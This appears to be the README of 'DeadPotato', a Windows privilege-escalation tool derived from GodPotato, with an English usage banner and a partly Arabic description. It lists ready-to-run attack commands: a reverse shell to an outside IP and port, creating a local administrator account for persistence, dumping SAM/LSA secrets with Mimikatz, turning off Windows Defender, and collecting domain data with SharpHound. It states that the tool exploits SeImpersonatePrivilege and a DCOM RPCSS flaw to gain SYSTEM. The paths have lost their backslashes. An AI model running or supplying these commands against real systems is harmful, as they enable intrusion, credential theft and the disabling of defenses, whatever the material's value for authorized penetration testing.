C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
هل تم تمكين حق SeImpersonatePrivilege
في السياق الخاص بك؟ مع DeadPotato ، من الممكن تحقيق أقصى قدر من الامتيازات على النظام المحلي.
ستحاول الأداة بدء عملية مرتفعة يتم تشغيلها في سياق مستخدم NT AUTHORITYSYSTEM
عن طريق استغلال ثغرة RPCSS الخاصة بـ DCOM في التعامل مع OXIDs، مما يسمح بالوصول غير المقيد عبر الجهاز لتنفيذ العمليات الهامة بحرية.-cmd
. العديد من الوحدات متاحة للاستخدام، مثل -rev IP:PORT
لإنتاج غلاف عكسي مرتفع، -newadmin usr:pass
لإنشاء مستخدم مسؤول محلي جديد للاستمرارية، أو -mimi sam
لتفريغ تجزئات SAM.
من أجل استخدام DeadPotato، يجب تمكين حق SeImpersonatePrivilege في السياق الحالي. وللتحقق من ذلك، يمكن تنفيذ الأمر whoami /priv
. إذا تم تعطيل الامتياز، فإن الاستغلال غير ممكن في السياق الحالي.
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
هذا المشروع "DeadPotato" عبارة عن أداة مبنية على الكود المصدري للتحفة الفنية "GodPotato" من BeichenDream. إذا أعجبك هذا المشروع، فتأكد أيضًا من تقديم الدعم للمشروع الأصلي
BeichenDream، بنيامين ديلبي gentilkiwi
، مطورو BloodHound.
تم ترخيص هذا المشروع بموجب ترخيص Apache 2.0. يرجى مراجعة ملف الترخيص لمزيد من التفاصيل.